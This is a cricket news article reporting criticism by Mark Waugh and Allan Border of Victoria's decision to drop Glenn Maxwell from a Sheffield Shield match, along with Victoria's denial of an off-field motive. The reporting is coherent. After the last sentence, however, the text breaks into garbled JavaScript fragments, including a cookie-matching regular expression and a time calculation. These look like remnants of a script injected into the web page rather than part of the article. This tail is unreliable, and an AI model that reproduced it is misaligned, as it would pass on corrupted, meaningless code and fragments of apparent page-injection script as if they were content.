National selector Mark Waugh has slammed Glenn Maxwell's axing from the Victorian side.
Maxwell was left out of Victoria's Sheffield Shield side that defeated Tasmania at the MCG last week, with coach Andrew McDonald citing team balance as the reason behind the decision.
Former Australian great, Waugh, told Fox Sports that there is no way Maxwell should have been left out of the side.
“He should have been playing,” Waugh told Fox Sports' Inside Cricket.
“He's definitely in the best 11 players in Victoria. From an Australian point of view, he's quite capable of playing Test match cricket.
“You need to be asking the Victorian selectors why they left him out. It surely can't be cricket-related because he would be in the team.”
Despite Waugh's inference that there was an off-field reason behind his axing, Victoria denied reports that Maxwell's bid to join New South Wales prior to the start of the season was behind the decision.
Waugh was not the only one to question the decision, with former Australian captain Allan Border also suggesting something other than form was behind his axing.
“It's got to be something more than form or talent or skills or potential,” Border said.
“I'd be looking elsewhere pretty soon."
Maxwell has been named in Victoria's 13-man squad for Thursday Shield game against Queensland at the MCG. "(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
